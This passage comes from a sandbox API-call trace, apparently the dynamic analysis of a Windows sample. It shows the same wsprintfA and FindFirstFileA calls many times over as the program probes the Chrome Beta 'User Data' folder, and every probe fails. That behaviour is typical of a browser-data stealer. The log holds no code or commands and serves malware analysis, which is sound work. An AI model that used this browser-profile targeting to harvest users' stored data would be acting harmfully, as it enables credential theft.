lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.649] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.650] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.650] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.650] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.650] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.650] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.650] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.650] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.651] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.651] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.709] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.709] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.709] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.709] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.709] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.709] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.709] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.710] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.712] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.712] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.712] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.712] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.712] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.712] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.712] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.713] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.713] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: 